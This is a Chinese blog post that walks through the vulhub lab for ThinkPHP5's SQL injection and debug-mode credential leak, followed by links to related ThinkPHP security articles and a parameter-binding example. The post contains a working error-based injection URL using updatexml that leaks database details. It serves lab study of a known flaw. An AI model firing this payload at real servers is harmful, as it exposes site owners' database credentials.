vulhub中ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

最新推荐文章于 2024-05-20 10:30:44 发布
最新推荐文章于 2024-05-20 10:30:44 发布
阅读量868 收藏
点赞数 10
分类专栏: vulhub漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136517617
版权

漏洞原理

传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码

启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。

漏洞利用

访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:

可以找到了数据库的账号、密码:

余生有个小酒馆
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 6998
跟进Request.phpmethod(),Config::get(‘var_method’)提权var_method的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
web安全】DolphinPHP RCE漏洞分析
HBohan的博客
04-07 3807
DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。 漏洞分析 看到application\common.php#action_log函数 观察到有
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
qq_50854662的博客
10-23 1372
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5.2.x 这几个版本,都无需登入可以进行远程代码执行。 漏洞版本: 5.0.x5.1.x5.2.x 漏洞搭建
thinkphp 5-rce(rce漏洞getshell)
weixin_51692662的博客
11-03 2761
thinkphp 5-rce(rce漏洞getshell)
代码审计-PHP框架开发篇&ThinkPHP&版本缺陷&不安全写法&路由访问&利用链
最新发布
siu~
05-20 658
1、PHP框架学习-ThinkPHP-架构&调试&路由&接受 2、PHP框架审计-ThinkPHP-不安全写法&版本漏洞
fastadmin-thinkphp5.1:ThinkPHP 5.1.38 LTS的fastadmin
05-29
FastAdmin 完全升级 thinkphp5.1 fastadmin: 1.0.0.20190418_beta thinkphp: 5.1.38 LTS 安装使用 环境要求 PHP >= PHP7.1 Mysql >= 5.5.0 (需支持innodb引擎) Apache 或 Nginx PDO PHP Extension MBstring PHP Extension CURL PHP Extension Node.js (可选,用于安装Bower和LESS,同时打包压缩也需要使用到) Composer (可选,用于管理第三方扩展包) Bower (可选,用于管理前端资源) Less (可选,用于编辑less文件,如果你需要增改css样式,最好安装上) 安装 克隆项目 git clone https://github.com/hellowzsg/fastadmin-thinkphp5.
Thinkphp5.X 设计缺陷导致泄漏数据库账户密码
Fly_鹏程万里
12-11 9037
0x00 框架运行环境 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入漏洞。...
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
jammny
01-21 4058
前言 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 Voulhub靶机平台环境搭建和使用: https://blog.csdn.net/qq_41832837/article/details/103948358 目录: 漏洞原理 漏洞详情 漏洞复现 ...
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
主要介绍了对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析,对于网站安全十分重要!需要的朋友可以参考下
thinkphp3 与thinkphp5 日志信息泄露检测脚本.zip
02-20
这个压缩包文件“thinkphp3与thinkphp5日志信息泄露检测脚本.zip”提供了针对ThinkPHP 3和ThinkPHP 5版本的检测工具,用于检查可能存在的日志泄露问题。下面我们将深入探讨ThinkPHP框架的日志系统、信息泄露的风险...
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP链1
08-03
ThinkPHP v3.2.X 反序列化漏洞SQL注入及文件读取利用分析》 ThinkPHP是一款广泛使用的PHP框架,其3.2.*版本存在反序列化漏洞,允许攻击者通过精心构造的数据包触发特定行为,如SQL注入和文件读取。本文将深入...
thinkPHP框架执行原生SQL语句的方法
10-19
本篇文章将深入探讨如何在ThinkPHP执行原生SQL语句,并对比`query()`和`execute()`这两个方法的使用场景和差异。 首先,执行原生SQL语句的方法通常涉及创建一个模型对象。在ThinkPHP,你可以通过以下方式实例化...
Thinkphp5.1 反序列化漏洞复现
feng的博客
02-18 4289
前言 开始tp5.1的反序列化链的复现,这个链我上学期10月份的时候尝试复现过,但是当时的自己代码审计能力,反序列化的能力也都实在太菜,不足以理解这个链。这个链相比yii2,laravel5.7,5.8的那些链,长度和难度都提高了很多,思维的跳跃也很,自己也要想办法把它啃下来。 源码下载: thinkphp5源码 或者去github上下载也可以。 然后写个控制器: <?php namespace app\index\controller; class Unserialize { pub
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 漏洞复现
ADummy的博客
02-20 1539
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 by ADummy 0x00利用路线 ​ url直接注入—>有回显 0x01漏洞介绍 ​ ThinkPHP是在国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23),开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码 0x02漏洞复现 payload: h
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 704
关于vulhubthinkPHP SQL注入漏洞复现及其简单的原理介绍
Thinkphp漏洞复现
qq_63980959的博客
05-19 370
其 5.0.23 以前的版本,获取 method 的方法没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。在其版本 5 ,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。
thinkphp防止sql注入例子
06-03
为了防止SQL注入攻击,ThinkPHP提供了多种方法,例如参数绑定、数据类型检测、预处理语句等。下面是一个使用参数绑定的例子: ``` $username = input('post.username'); $password = input('post.password'); $user = Db::query('select * from users where username = ? and password = ?', [$username, $password]); if ($user) { // 登录成功 } else { // 登录失败 } ``` 上面的代码,`$username`和`$password`是从`POST`请求获取的,然后使用参数绑定的方式将它们绑定到SQL语句,这样可以避免SQL注入攻击。另外,还可以使用`Db::execute`方法来执行预处理语句,例如: ``` $username = input('post.username'); $password = input('post.password'); $sth = Db::execute('select * from users where username = ? and password = ?', [$username, $password]); if ($sth->rowCount()) { // 登录成功 } else { // 登录失败 } ``` 预处理语句会在执行前进行编译,可以有效地防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值